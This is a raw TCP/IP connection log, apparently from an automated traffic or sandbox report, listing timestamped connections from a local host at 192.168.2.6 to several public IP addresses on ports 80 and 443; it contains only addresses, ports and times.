                                                                                                                                                Feb 22, 2021 23:44:31.998774052 CET4979880192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:32.010500908 CET8049789172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:32.010684013 CET4978980192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:32.045859098 CET8049798172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:32.458513975 CET8049798172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:32.461682081 CET4979880192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:32.464891911 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:32.513128996 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:32.513278961 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:32.514664888 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:32.561394930 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:32.565110922 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:32.566457033 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:32.567102909 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:32.573771000 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:32.613900900 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:32.621370077 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.357774973 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.357811928 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.357841969 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.357870102 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.357908964 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.357949018 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.357988119 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.358016014 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.358066082 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.358068943 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.358099937 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.358105898 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.358206034 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.358218908 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.358220100 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.358455896 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.358753920 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.358772039 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.395750046 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.395787001 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.395895004 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.395924091 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.395931005 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.395972967 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.396094084 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.396131039 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.396475077 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.396518946 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.396563053 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.396619081 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.397670031 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.397721052 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.397785902 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.397860050 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.398680925 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.398725986 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.398772001 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.398827076 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.399791956 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.399847031 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.399902105 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.399947882 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.400893927 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.400937080 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.401007891 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.401057005 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.402036905 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.402116060 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.402153015 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.402203083 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.403103113 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.403145075 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.403227091 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.404155970 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.404200077 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.404273033 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.404328108 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.405280113 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.405320883 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.405431986 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.406368971 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.406413078 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.406467915 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.406518936 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.407469034 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.407525063 CET44349799172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.407636881 CET49799443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:33.476537943 CET4979180192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:33.478626966 CET4980080192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:33.549088001 CET80498005.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.549217939 CET4980080192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:33.549498081 CET80497915.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.549609900 CET4979180192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:33.550338984 CET4980080192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:33.618680954 CET80498005.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.618799925 CET80498005.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.618949890 CET4980080192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:33.625781059 CET49801443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:33.696929932 CET443498015.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.697150946 CET49801443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:33.697607040 CET49801443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:33.768673897 CET443498015.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.768795013 CET443498015.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:33.768894911 CET49801443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:33.769339085 CET49801443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:33.795778990 CET49801443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:33.866928101 CET443498015.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:34.232599020 CET443498015.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:34.232650042 CET443498015.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:34.232691050 CET443498015.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:34.232728958 CET443498015.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:34.232767105 CET443498015.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:34.232805967 CET443498015.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:34.232821941 CET49801443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:34.232850075 CET49801443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:34.232848883 CET443498015.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:34.232888937 CET49801443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:34.232904911 CET49801443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:34.233253002 CET49801443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:34.236479998 CET4979380192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:34.238050938 CET4980280192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:34.306421041 CET443498015.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:34.306546926 CET49801443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:34.408175945 CET8049793192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:34.408310890 CET4979380192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:34.409671068 CET8049802192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:34.409792900 CET4980280192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:34.410227060 CET4980280192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:34.579698086 CET8049802192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:34.579742908 CET8049802192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:34.579822063 CET4980280192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:34.583304882 CET49794443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:34.616558075 CET49803443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:34.630125999 CET44349794216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:34.632159948 CET44349794216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:34.632234097 CET49794443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:34.659074068 CET44349803216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:34.659193993 CET49803443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:34.659737110 CET49803443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:34.702302933 CET44349803216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:34.713335991 CET44349803216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:34.713398933 CET44349803216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:34.713422060 CET49803443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:34.713438988 CET44349803216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:34.713490963 CET49803443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:34.713516951 CET49803443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:34.720371008 CET49803443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:34.766544104 CET44349803216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:34.768434048 CET44349803216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:34.768517971 CET49803443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:34.769139051 CET49803443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:34.815521002 CET44349803216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:35.126657009 CET44349803216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:35.126698971 CET44349803216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:35.126749992 CET44349803216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:35.126760006 CET49803443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:35.126792908 CET49803443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:35.126816988 CET44349803216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:35.126817942 CET49803443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:35.126899958 CET49803443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:35.330837965 CET4979580192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:35.331688881 CET4980480192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:35.387428045 CET8049795104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:35.387531996 CET4979580192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:35.387986898 CET8049804104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:35.391803026 CET4980480192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:35.392251015 CET4980480192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:35.448446035 CET8049804104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:35.563349962 CET8049804104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:35.565938950 CET4980480192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:35.568645000 CET49796443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:35.625336885 CET44349796104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:35.625374079 CET44349796104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:35.625473976 CET49796443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:35.625636101 CET49796443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:35.738100052 CET49805443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:35.794332981 CET44349805104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:35.795521975 CET49805443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:35.796222925 CET49805443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:35.852691889 CET44349805104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:35.852747917 CET44349805104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:35.852960110 CET49805443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:35.853606939 CET49805443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:35.860599995 CET49805443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:35.912038088 CET44349805104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:35.918431997 CET44349805104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.033230066 CET44349805104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.033361912 CET49805443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:36.036587000 CET49806443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:36.093221903 CET44349806104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.096008062 CET49806443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:36.096438885 CET49806443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:36.152868986 CET44349806104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.152905941 CET44349806104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.153162956 CET49806443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:36.153672934 CET49806443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:36.159663916 CET49806443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:36.210220098 CET44349806104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.216028929 CET44349806104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.341737032 CET44349806104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.341762066 CET44349806104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.341778040 CET44349806104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.341790915 CET44349806104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.341803074 CET44349806104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.341816902 CET44349806104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.341826916 CET44349806104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.341835022 CET44349806104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.341886997 CET44349806104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.341939926 CET49806443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:36.342067003 CET49806443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:36.342588902 CET49806443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:36.342616081 CET49806443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:36.345057011 CET4979880192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:36.346035004 CET4980780192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:36.392360926 CET8049798172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.392457962 CET4979880192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:36.393320084 CET8049807172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.393429995 CET4980780192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:36.394046068 CET4980780192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:36.398858070 CET44349806104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.398890972 CET44349806104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.398955107 CET49806443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:36.398998976 CET49806443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:36.443734884 CET8049807172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.871387959 CET8049807172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.871566057 CET4980780192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:36.877099037 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:36.930516958 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.930679083 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:36.931097984 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:36.985197067 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.987056971 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:36.987128019 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:36.987560034 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:36.991888046 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.040704012 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.045157909 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.553250074 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.553287029 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.553354025 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.553401947 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.553407907 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.553448915 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.553495884 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.553497076 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.553508997 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.553535938 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.553575039 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.553581953 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.553591013 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.553658009 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.553662062 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.553698063 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.553714991 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.553751945 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.553947926 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.553989887 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.588893890 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.588938951 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.588980913 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.589010000 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.589049101 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.589078903 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.589167118 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.589217901 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.589703083 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.589775085 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.589776039 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.589832067 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.591032028 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.591075897 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.591093063 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.591130018 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.592277050 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.592331886 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.592350960 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.592384100 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.593586922 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.593626976 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.593652964 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.593709946 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.594831944 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.594873905 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.594902039 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.594929934 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.596072912 CET44349808172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.596142054 CET49808443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:37.656776905 CET4980080192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:37.658214092 CET4980980192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:37.726741076 CET80498005.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.726824999 CET4980080192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:37.730475903 CET80498095.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.730567932 CET4980980192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:37.731024027 CET4980980192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:37.804172993 CET80498095.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.804403067 CET80498095.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.804464102 CET4980980192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:37.806931973 CET49810443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:37.878108025 CET443498105.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.878236055 CET49810443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:37.878700972 CET49810443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:37.949848890 CET443498105.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.949877024 CET443498105.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:37.949974060 CET49810443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:37.950472116 CET49810443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:37.953620911 CET49810443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:38.026256084 CET443498105.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:38.387765884 CET443498105.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:38.387820959 CET443498105.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:38.387861013 CET443498105.9.110.84192.168.2.6
